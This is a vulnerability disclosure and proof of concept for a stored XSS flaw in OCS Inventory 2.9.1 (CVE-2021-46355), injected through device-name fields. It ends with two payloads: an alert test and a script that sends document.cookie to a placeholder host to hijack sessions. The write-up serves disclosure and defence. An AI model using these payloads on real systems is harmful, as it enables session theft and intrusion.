OCS Inventory 2.9.1 XSS Stored + Hijack Session (CVE-2021-46355)
OCS Inventory 2.9.1 is affected by Cross Site Scripting (XSS). To exploit the vulnerability, the attacker needs to manipulate the name of some device on your computer, such as a printer, replacing the device name with some malicious code that allows the execution of Stored Cross-site Scripting (XSS). Through this vulnerability an attacker can hijack valid sessions.
After some time analyzing the OCS Inventory platform, I could see that the entries available for manual input were not susceptible to any kind of malicious manipulation like XSS, for example.
As I use OCS Inventory periodically, I know that its functionality consists of collecting information from assets available on the network such as computers and their peripherals and other devices.
Considering that the available inputs were not subject to any manipulation, so I thought:
Ok. I can’t manipulate the available inputs, but what if I manipulate the data collected and displayed in OCS so that it’s interpreted and executed the way I want(?)
So I started to analyze what information was collected on the computer through the OCS client and what modifications could be made and I found two attack vectors.
The first attack vector is the computer description field.
The second attack vector I used the printer name field, in this case.
Proof of Concept exploring the two vectors mentioned here.
Used Payloads
Attack 1:
<IMG SRC=x onerror=”alert(1);”>Attack 2:
<script>
var i=new Image;i.src=”http://YOUR_IP/?"+document.cookie;
</script>CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46355
